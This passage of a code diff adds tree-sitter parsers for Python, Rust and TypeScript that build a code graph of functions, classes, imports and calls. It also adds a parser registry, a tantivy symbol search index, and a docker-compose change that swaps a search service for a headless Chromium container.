// Extract superclasses
if let Some(bases) = node.child_by_field_name("superclasses") {
self.extract_inheritance(
bases,
source,
file_path,
repo_id,
graph_build_id,
&qualified,
output,
);
}
// Walk methods
if let Some(body) = node.child_by_field_name("body") {
self.walk_children(
body,
source,
file_path,
repo_id,
graph_build_id,
Some(&qualified),
output,
);
}
return;
}
}
"import_statement" | "import_from_statement" => {
let import_text = &source[node.byte_range()];
if let Some(module) = self.extract_import_module(import_text) {
output.edges.push(CodeEdge {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
source: parent_qualified.unwrap_or(file_path).to_string(),
target: module,
kind: CodeEdgeKind::Imports,
file_path: file_path.to_string(),
line_number: Some(node.start_position().row as u32 + 1),
});
}
}
_ => {}
}
self.walk_children(
node,
source,
file_path,
repo_id,
graph_build_id,
parent_qualified,
output,
);
}
fn walk_children(
&self,
node: Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
parent_qualified: Option<&str>,
output: &mut ParseOutput,
) {
let mut cursor = node.walk();
for child in node.children(&mut cursor) {
self.walk_tree(
child,
source,
file_path,
repo_id,
graph_build_id,
parent_qualified,
output,
);
}
}
fn extract_calls(
&self,
node: Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
caller_qualified: &str,
output: &mut ParseOutput,
) {
if node.kind() == "call" {
if let Some(func_node) = node.child_by_field_name("function") {
let callee = &source[func_node.byte_range()];
output.edges.push(CodeEdge {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
source: caller_qualified.to_string(),
target: callee.to_string(),
kind: CodeEdgeKind::Calls,
file_path: file_path.to_string(),
line_number: Some(node.start_position().row as u32 + 1),
});
}
}
let mut cursor = node.walk();
for child in node.children(&mut cursor) {
self.extract_calls(
child,
source,
file_path,
repo_id,
graph_build_id,
caller_qualified,
output,
);
}
}
fn extract_inheritance(
&self,
node: Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
class_qualified: &str,
output: &mut ParseOutput,
) {
let mut cursor = node.walk();
for child in node.children(&mut cursor) {
if child.kind() == "identifier" || child.kind() == "attribute" {
let base_name = &source[child.byte_range()];
output.edges.push(CodeEdge {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
source: class_qualified.to_string(),
target: base_name.to_string(),
kind: CodeEdgeKind::Inherits,
file_path: file_path.to_string(),
line_number: Some(node.start_position().row as u32 + 1),
});
}
}
}
fn has_decorator(&self, node: &Node<'_>, source: &str, decorator_name: &str) -> bool {
if let Some(prev) = node.prev_sibling() {
if prev.kind() == "decorator" {
let text = &source[prev.byte_range()];
return text.contains(decorator_name);
}
}
false
}
fn extract_import_module(&self, import_text: &str) -> Option<String> {
if let Some(rest) = import_text.strip_prefix("from ") {
// "from foo.bar import baz" -> "foo.bar"
let module = rest.split_whitespace().next()?;
Some(module.to_string())
} else if let Some(rest) = import_text.strip_prefix("import ") {
let module = rest.trim().trim_end_matches(';');
Some(module.to_string())
} else {
None
}
}
}
impl LanguageParser for PythonParser {
fn language(&self) -> &str {
"python"
}
fn extensions(&self) -> &[&str] {
&["py"]
}
fn parse_file(
&self,
file_path: &Path,
source: &str,
repo_id: &str,
graph_build_id: &str,
) -> Result<ParseOutput, CoreError> {
let mut parser = Parser::new();
let language = tree_sitter_python::LANGUAGE;
parser
.set_language(&language.into())
.map_err(|e| CoreError::Graph(format!("Failed to set Python language: {e}")))?;
let tree = parser
.parse(source, None)
.ok_or_else(|| CoreError::Graph("Failed to parse Python file".to_string()))?;
let file_path_str = file_path.to_string_lossy().to_string();
let mut output = ParseOutput::default();
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: file_path_str.clone(),
name: file_path
.file_name()
.map(|n| n.to_string_lossy().to_string())
.unwrap_or_default(),
kind: CodeNodeKind::File,
file_path: file_path_str.clone(),
start_line: 1,
end_line: source.lines().count() as u32,
language: "python".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
self.walk_tree(
tree.root_node(),
source,
&file_path_str,
repo_id,
graph_build_id,
None,
&mut output,
);
Ok(output)
}
}

View File

@@ -0,0 +1,182 @@
use std::collections::HashMap;
use std::path::Path;
use compliance_core::error::CoreError;
use compliance_core::traits::graph_builder::{LanguageParser, ParseOutput};
use tracing::info;
use super::javascript::JavaScriptParser;
use super::python::PythonParser;
use super::rust_parser::RustParser;
use super::typescript::TypeScriptParser;
/// Registry of language parsers, indexed by file extension
pub struct ParserRegistry {
parsers: Vec<Box<dyn LanguageParser>>,
extension_map: HashMap<String, usize>,
}
impl ParserRegistry {
/// Create a registry with all built-in parsers
pub fn new() -> Self {
let parsers: Vec<Box<dyn LanguageParser>> = vec![
Box::new(RustParser::new()),
Box::new(PythonParser::new()),
Box::new(JavaScriptParser::new()),
Box::new(TypeScriptParser::new()),
];
let mut extension_map = HashMap::new();
for (idx, parser) in parsers.iter().enumerate() {
for ext in parser.extensions() {
extension_map.insert(ext.to_string(), idx);
}
}
Self {
parsers,
extension_map,
}
}
/// Check if a file extension is supported
pub fn supports_extension(&self, ext: &str) -> bool {
self.extension_map.contains_key(ext)
}
/// Get supported extensions
pub fn supported_extensions(&self) -> Vec<&str> {
self.extension_map.keys().map(|s| s.as_str()).collect()
}
/// Parse a file, selecting the appropriate parser by extension
pub fn parse_file(
&self,
file_path: &Path,
source: &str,
repo_id: &str,
graph_build_id: &str,
) -> Result<Option<ParseOutput>, CoreError> {
let ext = file_path
.extension()
.and_then(|e| e.to_str())
.unwrap_or("");
let parser_idx = match self.extension_map.get(ext) {
Some(idx) => *idx,
None => return Ok(None),
};
let parser = &self.parsers[parser_idx];
info!(
file = %file_path.display(),
language = parser.language(),
"Parsing file"
);
let output = parser.parse_file(file_path, source, repo_id, graph_build_id)?;
Ok(Some(output))
}
/// Parse all supported files in a directory tree
pub fn parse_directory(
&self,
dir: &Path,
repo_id: &str,
graph_build_id: &str,
max_nodes: u32,
) -> Result<ParseOutput, CoreError> {
let mut combined = ParseOutput::default();
let mut node_count: u32 = 0;
self.walk_directory(dir, dir, repo_id, graph_build_id, max_nodes, &mut node_count, &mut combined)?;
info!(
nodes = combined.nodes.len(),
edges = combined.edges.len(),
"Directory parsing complete"
);
Ok(combined)
}
fn walk_directory(
&self,
base: &Path,
dir: &Path,
repo_id: &str,
graph_build_id: &str,
max_nodes: u32,
node_count: &mut u32,
combined: &mut ParseOutput,
) -> Result<(), CoreError> {
let entries = std::fs::read_dir(dir).map_err(|e| {
CoreError::Graph(format!("Failed to read directory {}: {e}", dir.display()))
})?;
for entry in entries {
let entry = entry.map_err(|e| CoreError::Graph(format!("Dir entry error: {e}")))?;
let path = entry.path();
// Skip hidden directories and common non-source dirs
if let Some(name) = path.file_name().and_then(|n| n.to_str()) {
if name.starts_with('.')
|| name == "node_modules"
|| name == "target"
|| name == "__pycache__"
|| name == "vendor"
|| name == "dist"
|| name == "build"
|| name == ".git"
{
continue;
}
}
if path.is_dir() {
self.walk_directory(
base,
&path,
repo_id,
graph_build_id,
max_nodes,
node_count,
combined,
)?;
} else if path.is_file() {
if *node_count >= max_nodes {
info!(max_nodes, "Reached node limit, stopping parse");
return Ok(());
}
let ext = path.extension().and_then(|e| e.to_str()).unwrap_or("");
if !self.supports_extension(ext) {
continue;
}
// Use relative path from base
let rel_path = path.strip_prefix(base).unwrap_or(&path);
let source = match std::fs::read_to_string(&path) {
Ok(s) => s,
Err(_) => continue, // Skip binary/unreadable files
};
if let Some(output) = self.parse_file(rel_path, &source, repo_id, graph_build_id)?
{
*node_count += output.nodes.len() as u32;
combined.nodes.extend(output.nodes);
combined.edges.extend(output.edges);
}
}
}
Ok(())
}
}
impl Default for ParserRegistry {
fn default() -> Self {
Self::new()
}
}

View File

@@ -0,0 +1,426 @@
use std::path::Path;
use compliance_core::error::CoreError;
use compliance_core::models::graph::{CodeEdge, CodeEdgeKind, CodeNode, CodeNodeKind};
use compliance_core::traits::graph_builder::{LanguageParser, ParseOutput};
use tree_sitter::{Node, Parser};
pub struct RustParser;
impl RustParser {
pub fn new() -> Self {
Self
}
fn walk_tree(
&self,
node: Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
parent_qualified: Option<&str>,
output: &mut ParseOutput,
) {
match node.kind() {
"function_item" | "function_signature_item" => {
if let Some(name_node) = node.child_by_field_name("name") {
let name = &source[name_node.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}::{name}"),
None => format!("{file_path}::{name}"),
};
let is_entry = name == "main"
|| self.has_attribute(&node, source, "test")
|| self.has_attribute(&node, source, "tokio::main")
|| self.has_pub_visibility(&node, source);
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified.clone(),
name: name.to_string(),
kind: CodeNodeKind::Function,
file_path: file_path.to_string(),
start_line: node.start_position().row as u32 + 1,
end_line: node.end_position().row as u32 + 1,
language: "rust".to_string(),
community_id: None,
is_entry_point: is_entry,
graph_index: None,
});
// Extract function calls within the body
if let Some(body) = node.child_by_field_name("body") {
self.extract_calls(
body,
source,
file_path,
repo_id,
graph_build_id,
&qualified,
output,
);
}
}
}
"struct_item" => {
if let Some(name_node) = node.child_by_field_name("name") {
let name = &source[name_node.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}::{name}"),
None => format!("{file_path}::{name}"),
};
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified,
name: name.to_string(),
kind: CodeNodeKind::Struct,
file_path: file_path.to_string(),
start_line: node.start_position().row as u32 + 1,
end_line: node.end_position().row as u32 + 1,
language: "rust".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
}
}
"enum_item" => {
if let Some(name_node) = node.child_by_field_name("name") {
let name = &source[name_node.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}::{name}"),
None => format!("{file_path}::{name}"),
};
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified,
name: name.to_string(),
kind: CodeNodeKind::Enum,
file_path: file_path.to_string(),
start_line: node.start_position().row as u32 + 1,
end_line: node.end_position().row as u32 + 1,
language: "rust".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
}
}
"trait_item" => {
if let Some(name_node) = node.child_by_field_name("name") {
let name = &source[name_node.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}::{name}"),
None => format!("{file_path}::{name}"),
};
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified.clone(),
name: name.to_string(),
kind: CodeNodeKind::Trait,
file_path: file_path.to_string(),
start_line: node.start_position().row as u32 + 1,
end_line: node.end_position().row as u32 + 1,
language: "rust".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
// Parse methods inside the trait
self.walk_children(
node,
source,
file_path,
repo_id,
graph_build_id,
Some(&qualified),
output,
);
return; // Don't walk children again
}
}
"impl_item" => {
// Extract impl target type for qualified naming
let impl_name = self.extract_impl_type(&node, source);
let qualified = match parent_qualified {
Some(p) => format!("{p}::{impl_name}"),
None => format!("{file_path}::{impl_name}"),
};
// Check for trait impl (impl Trait for Type)
if let Some(trait_node) = node.child_by_field_name("trait") {
let trait_name = &source[trait_node.byte_range()];
output.edges.push(CodeEdge {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
source: qualified.clone(),
target: trait_name.to_string(),
kind: CodeEdgeKind::Implements,
file_path: file_path.to_string(),
line_number: Some(node.start_position().row as u32 + 1),
});
}
// Walk methods inside impl block
self.walk_children(
node,
source,
file_path,
repo_id,
graph_build_id,
Some(&qualified),
output,
);
return;
}
"use_declaration" => {
let use_text = &source[node.byte_range()];
// Extract the imported path
if let Some(path) = self.extract_use_path(use_text) {
output.edges.push(CodeEdge {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
source: parent_qualified
.unwrap_or(file_path)
.to_string(),
target: path,
kind: CodeEdgeKind::Imports,
file_path: file_path.to_string(),
line_number: Some(node.start_position().row as u32 + 1),
});
}
}
"mod_item" => {
if let Some(name_node) = node.child_by_field_name("name") {
let name = &source[name_node.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}::{name}"),
None => format!("{file_path}::{name}"),
};
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified.clone(),
name: name.to_string(),
kind: CodeNodeKind::Module,
file_path: file_path.to_string(),
start_line: node.start_position().row as u32 + 1,
end_line: node.end_position().row as u32 + 1,
language: "rust".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
// If it has a body (inline module), walk it
if let Some(body) = node.child_by_field_name("body") {
self.walk_children(
body,
source,
file_path,
repo_id,
graph_build_id,
Some(&qualified),
output,
);
return;
}
}
}
_ => {}
}
// Default: walk children
self.walk_children(
node,
source,
file_path,
repo_id,
graph_build_id,
parent_qualified,
output,
);
}
fn walk_children(
&self,
node: Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
parent_qualified: Option<&str>,
output: &mut ParseOutput,
) {
let mut cursor = node.walk();
for child in node.children(&mut cursor) {
self.walk_tree(
child,
source,
file_path,
repo_id,
graph_build_id,
parent_qualified,
output,
);
}
}
fn extract_calls(
&self,
node: Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
caller_qualified: &str,
output: &mut ParseOutput,
) {
if node.kind() == "call_expression" {
if let Some(func_node) = node.child_by_field_name("function") {
let callee = &source[func_node.byte_range()];
output.edges.push(CodeEdge {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
source: caller_qualified.to_string(),
target: callee.to_string(),
kind: CodeEdgeKind::Calls,
file_path: file_path.to_string(),
line_number: Some(node.start_position().row as u32 + 1),
});
}
}
let mut cursor = node.walk();
for child in node.children(&mut cursor) {
self.extract_calls(
child,
source,
file_path,
repo_id,
graph_build_id,
caller_qualified,
output,
);
}
}
fn has_attribute(&self, node: &Node<'_>, source: &str, attr_name: &str) -> bool {
if let Some(prev) = node.prev_sibling() {
if prev.kind() == "attribute_item" || prev.kind() == "attribute" {
let text = &source[prev.byte_range()];
return text.contains(attr_name);
}
}
false
}
fn has_pub_visibility(&self, node: &Node<'_>, source: &str) -> bool {
let mut cursor = node.walk();
for child in node.children(&mut cursor) {
if child.kind() == "visibility_modifier" {
let text = &source[child.byte_range()];
return text == "pub";
}
}
false
}
fn extract_impl_type(&self, node: &Node<'_>, source: &str) -> String {
if let Some(type_node) = node.child_by_field_name("type") {
return source[type_node.byte_range()].to_string();
}
"unknown".to_string()
}
fn extract_use_path(&self, use_text: &str) -> Option<String> {
// "use foo::bar::baz;" -> "foo::bar::baz"
let trimmed = use_text
.strip_prefix("use ")?
.trim_end_matches(';')
.trim();
Some(trimmed.to_string())
}
}
impl LanguageParser for RustParser {
fn language(&self) -> &str {
"rust"
}
fn extensions(&self) -> &[&str] {
&["rs"]
}
fn parse_file(
&self,
file_path: &Path,
source: &str,
repo_id: &str,
graph_build_id: &str,
) -> Result<ParseOutput, CoreError> {
let mut parser = Parser::new();
let language = tree_sitter_rust::LANGUAGE;
parser
.set_language(&language.into())
.map_err(|e| CoreError::Graph(format!("Failed to set Rust language: {e}")))?;
let tree = parser
.parse(source, None)
.ok_or_else(|| CoreError::Graph("Failed to parse Rust file".to_string()))?;
let file_path_str = file_path.to_string_lossy().to_string();
let mut output = ParseOutput::default();
// Add file node
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: file_path_str.clone(),
name: file_path
.file_name()
.map(|n| n.to_string_lossy().to_string())
.unwrap_or_default(),
kind: CodeNodeKind::File,
file_path: file_path_str.clone(),
start_line: 1,
end_line: source.lines().count() as u32,
language: "rust".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
self.walk_tree(
tree.root_node(),
source,
&file_path_str,
repo_id,
graph_build_id,
None,
&mut output,
);
Ok(output)
}
}

View File

@@ -0,0 +1,419 @@
use std::path::Path;
use compliance_core::error::CoreError;
use compliance_core::models::graph::{CodeEdge, CodeEdgeKind, CodeNode, CodeNodeKind};
use compliance_core::traits::graph_builder::{LanguageParser, ParseOutput};
use tree_sitter::{Node, Parser};
pub struct TypeScriptParser;
impl TypeScriptParser {
pub fn new() -> Self {
Self
}
fn walk_tree(
&self,
node: Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
parent_qualified: Option<&str>,
output: &mut ParseOutput,
) {
match node.kind() {
"function_declaration" => {
if let Some(name_node) = node.child_by_field_name("name") {
let name = &source[name_node.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}.{name}"),
None => format!("{file_path}::{name}"),
};
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified.clone(),
name: name.to_string(),
kind: CodeNodeKind::Function,
file_path: file_path.to_string(),
start_line: node.start_position().row as u32 + 1,
end_line: node.end_position().row as u32 + 1,
language: "typescript".to_string(),
community_id: None,
is_entry_point: self.is_exported(&node),
graph_index: None,
});
if let Some(body) = node.child_by_field_name("body") {
self.extract_calls(
body, source, file_path, repo_id, graph_build_id, &qualified, output,
);
}
}
}
"class_declaration" => {
if let Some(name_node) = node.child_by_field_name("name") {
let name = &source[name_node.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}.{name}"),
None => format!("{file_path}::{name}"),
};
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified.clone(),
name: name.to_string(),
kind: CodeNodeKind::Class,
file_path: file_path.to_string(),
start_line: node.start_position().row as u32 + 1,
end_line: node.end_position().row as u32 + 1,
language: "typescript".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
// Heritage clause (extends/implements)
self.extract_heritage(
&node, source, file_path, repo_id, graph_build_id, &qualified, output,
);
if let Some(body) = node.child_by_field_name("body") {
self.walk_children(
body, source, file_path, repo_id, graph_build_id, Some(&qualified),
output,
);
}
return;
}
}
"interface_declaration" => {
if let Some(name_node) = node.child_by_field_name("name") {
let name = &source[name_node.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}.{name}"),
None => format!("{file_path}::{name}"),
};
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified.clone(),
name: name.to_string(),
kind: CodeNodeKind::Interface,
file_path: file_path.to_string(),
start_line: node.start_position().row as u32 + 1,
end_line: node.end_position().row as u32 + 1,
language: "typescript".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
}
}
"method_definition" | "public_field_definition" => {
if let Some(name_node) = node.child_by_field_name("name") {
let name = &source[name_node.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}.{name}"),
None => format!("{file_path}::{name}"),
};
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified.clone(),
name: name.to_string(),
kind: CodeNodeKind::Method,
file_path: file_path.to_string(),
start_line: node.start_position().row as u32 + 1,
end_line: node.end_position().row as u32 + 1,
language: "typescript".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
if let Some(body) = node.child_by_field_name("body") {
self.extract_calls(
body, source, file_path, repo_id, graph_build_id, &qualified, output,
);
}
}
}
"lexical_declaration" | "variable_declaration" => {
self.extract_arrow_functions(
node, source, file_path, repo_id, graph_build_id, parent_qualified, output,
);
}
"import_statement" => {
let text = &source[node.byte_range()];
if let Some(module) = self.extract_import_source(text) {
output.edges.push(CodeEdge {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
source: parent_qualified.unwrap_or(file_path).to_string(),
target: module,
kind: CodeEdgeKind::Imports,
file_path: file_path.to_string(),
line_number: Some(node.start_position().row as u32 + 1),
});
}
}
_ => {}
}
self.walk_children(
node, source, file_path, repo_id, graph_build_id, parent_qualified, output,
);
}
fn walk_children(
&self,
node: Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
parent_qualified: Option<&str>,
output: &mut ParseOutput,
) {
let mut cursor = node.walk();
for child in node.children(&mut cursor) {
self.walk_tree(
child, source, file_path, repo_id, graph_build_id, parent_qualified, output,
);
}
}
fn extract_calls(
&self,
node: Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
caller_qualified: &str,
output: &mut ParseOutput,
) {
if node.kind() == "call_expression" {
if let Some(func_node) = node.child_by_field_name("function") {
let callee = &source[func_node.byte_range()];
output.edges.push(CodeEdge {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
source: caller_qualified.to_string(),
target: callee.to_string(),
kind: CodeEdgeKind::Calls,
file_path: file_path.to_string(),
line_number: Some(node.start_position().row as u32 + 1),
});
}
}
let mut cursor = node.walk();
for child in node.children(&mut cursor) {
self.extract_calls(
child, source, file_path, repo_id, graph_build_id, caller_qualified, output,
);
}
}
fn extract_arrow_functions(
&self,
node: Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
parent_qualified: Option<&str>,
output: &mut ParseOutput,
) {
let mut cursor = node.walk();
for child in node.children(&mut cursor) {
if child.kind() == "variable_declarator" {
let name_node = child.child_by_field_name("name");
let value_node = child.child_by_field_name("value");
if let (Some(name_n), Some(value_n)) = (name_node, value_node) {
if value_n.kind() == "arrow_function" || value_n.kind() == "function" {
let name = &source[name_n.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}.{name}"),
None => format!("{file_path}::{name}"),
};
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified.clone(),
name: name.to_string(),
kind: CodeNodeKind::Function,
file_path: file_path.to_string(),
start_line: child.start_position().row as u32 + 1,
end_line: child.end_position().row as u32 + 1,
language: "typescript".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
if let Some(body) = value_n.child_by_field_name("body") {
self.extract_calls(
body, source, file_path, repo_id, graph_build_id, &qualified,
output,
);
}
}
}
}
}
}
fn extract_heritage(
&self,
node: &Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
class_qualified: &str,
output: &mut ParseOutput,
) {
let mut cursor = node.walk();
for child in node.children(&mut cursor) {
if child.kind() == "class_heritage" {
let text = &source[child.byte_range()];
// "extends Base implements IFoo, IBar"
if let Some(rest) = text.strip_prefix("extends ") {
let base = rest.split_whitespace().next().unwrap_or(rest);
output.edges.push(CodeEdge {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
source: class_qualified.to_string(),
target: base.trim_matches(',').to_string(),
kind: CodeEdgeKind::Inherits,
file_path: file_path.to_string(),
line_number: Some(child.start_position().row as u32 + 1),
});
}
if text.contains("implements ") {
if let Some(impl_part) = text.split("implements ").nth(1) {
for iface in impl_part.split(',') {
let iface = iface.trim();
if !iface.is_empty() {
output.edges.push(CodeEdge {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
source: class_qualified.to_string(),
target: iface.to_string(),
kind: CodeEdgeKind::Implements,
file_path: file_path.to_string(),
line_number: Some(child.start_position().row as u32 + 1),
});
}
}
}
}
}
}
}
fn is_exported(&self, node: &Node<'_>) -> bool {
if let Some(parent) = node.parent() {
return parent.kind() == "export_statement";
}
false
}
fn extract_import_source(&self, import_text: &str) -> Option<String> {
let from_idx = import_text.find("from ");
let start = if let Some(idx) = from_idx {
idx + 5
} else {
import_text.find("import ")? + 7
};
let rest = &import_text[start..];
let module = rest
.trim()
.trim_matches(|c| c == '\'' || c == '"' || c == ';' || c == ' ');
if module.is_empty() {
None
} else {
Some(module.to_string())
}
}
}
impl LanguageParser for TypeScriptParser {
fn language(&self) -> &str {
"typescript"
}
fn extensions(&self) -> &[&str] {
&["ts", "tsx"]
}
fn parse_file(
&self,
file_path: &Path,
source: &str,
repo_id: &str,
graph_build_id: &str,
) -> Result<ParseOutput, CoreError> {
let mut parser = Parser::new();
let language = tree_sitter_typescript::LANGUAGE_TYPESCRIPT;
parser
.set_language(&language.into())
.map_err(|e| CoreError::Graph(format!("Failed to set TypeScript language: {e}")))?;
let tree = parser
.parse(source, None)
.ok_or_else(|| CoreError::Graph("Failed to parse TypeScript file".to_string()))?;
let file_path_str = file_path.to_string_lossy().to_string();
let mut output = ParseOutput::default();
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: file_path_str.clone(),
name: file_path
.file_name()
.map(|n| n.to_string_lossy().to_string())
.unwrap_or_default(),
kind: CodeNodeKind::File,
file_path: file_path_str.clone(),
start_line: 1,
end_line: source.lines().count() as u32,
language: "typescript".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
self.walk_tree(
tree.root_node(),
source,
&file_path_str,
repo_id,
graph_build_id,
None,
&mut output,
);
Ok(output)
}
}

View File

@@ -0,0 +1,128 @@
use compliance_core::error::CoreError;
use compliance_core::models::graph::CodeNode;
use tantivy::collector::TopDocs;
use tantivy::query::QueryParser;
use tantivy::schema::{Schema, Value, STORED, TEXT};
use tantivy::{doc, Index, IndexWriter, ReloadPolicy};
use tracing::info;
/// BM25 text search index over code symbols
pub struct SymbolIndex {
index: Index,
#[allow(dead_code)]
schema: Schema,
qualified_name_field: tantivy::schema::Field,
name_field: tantivy::schema::Field,
kind_field: tantivy::schema::Field,
file_path_field: tantivy::schema::Field,
language_field: tantivy::schema::Field,
}
#[derive(Debug, Clone, serde::Serialize)]
pub struct SearchResult {
pub qualified_name: String,
pub name: String,
pub kind: String,
pub file_path: String,
pub language: String,
pub score: f32,
}
impl SymbolIndex {
/// Create a new in-memory symbol index
pub fn new() -> Result<Self, CoreError> {
let mut schema_builder = Schema::builder();
let qualified_name_field = schema_builder.add_text_field("qualified_name", TEXT | STORED);
let name_field = schema_builder.add_text_field("name", TEXT | STORED);
let kind_field = schema_builder.add_text_field("kind", TEXT | STORED);
let file_path_field = schema_builder.add_text_field("file_path", TEXT | STORED);
let language_field = schema_builder.add_text_field("language", TEXT | STORED);
let schema = schema_builder.build();
let index = Index::create_in_ram(schema.clone());
Ok(Self {
index,
schema,
qualified_name_field,
name_field,
kind_field,
file_path_field,
language_field,
})
}
/// Index a set of code nodes
pub fn index_nodes(&self, nodes: &[CodeNode]) -> Result<(), CoreError> {
let mut writer: IndexWriter = self
.index
.writer(50_000_000)
.map_err(|e| CoreError::Graph(format!("Failed to create index writer: {e}")))?;
for node in nodes {
writer
.add_document(doc!(
self.qualified_name_field => node.qualified_name.as_str(),
self.name_field => node.name.as_str(),
self.kind_field => node.kind.to_string(),
self.file_path_field => node.file_path.as_str(),
self.language_field => node.language.as_str(),
))
.map_err(|e| CoreError::Graph(format!("Failed to add document: {e}")))?;
}
writer
.commit()
.map_err(|e| CoreError::Graph(format!("Failed to commit index: {e}")))?;
info!(nodes = nodes.len(), "Symbol index built");
Ok(())
}
/// Search for symbols matching a query
pub fn search(&self, query_str: &str, limit: usize) -> Result<Vec<SearchResult>, CoreError> {
let reader = self
.index
.reader_builder()
.reload_policy(ReloadPolicy::Manual)
.try_into()
.map_err(|e| CoreError::Graph(format!("Failed to create reader: {e}")))?;
let searcher = reader.searcher();
let query_parser =
QueryParser::for_index(&self.index, vec![self.name_field, self.qualified_name_field]);
let query = query_parser
.parse_query(query_str)
.map_err(|e| CoreError::Graph(format!("Failed to parse query: {e}")))?;
let top_docs = searcher
.search(&query, &TopDocs::with_limit(limit))
.map_err(|e| CoreError::Graph(format!("Search failed: {e}")))?;
let mut results = Vec::new();
for (score, doc_address) in top_docs {
let doc: tantivy::TantivyDocument = searcher
.doc(doc_address)
.map_err(|e| CoreError::Graph(format!("Failed to retrieve doc: {e}")))?;
let get_field = |field: tantivy::schema::Field| -> String {
doc.get_first(field)
.and_then(|v| v.as_str())
.unwrap_or("")
.to_string()
};
results.push(SearchResult {
qualified_name: get_field(self.qualified_name_field),
name: get_field(self.name_field),
kind: get_field(self.kind_field),
file_path: get_field(self.file_path_field),
language: get_field(self.language_field),
score,
});
}
Ok(results)
}
}

View File

@@ -0,0 +1 @@
pub mod index;

View File

@@ -9,13 +9,6 @@ services:
volumes:
- mongo_data:/data/db
searxng:
image: searxng/searxng:latest
ports:
- "8888:8080"
environment:
- SEARXNG_BASE_URL=http://localhost:8888
agent:
build:
context: .
@@ -40,6 +33,16 @@ services:
- mongo
- agent
chromium:
image: browserless/chrome:latest
ports:
- "3003:3000"
environment:
MAX_CONCURRENT_SESSIONS: 5
CONNECTION_TIMEOUT: 60000
PREBOOT_CHROME: "true"
restart: unless-stopped
volumes:
mongo_data:
repos_data: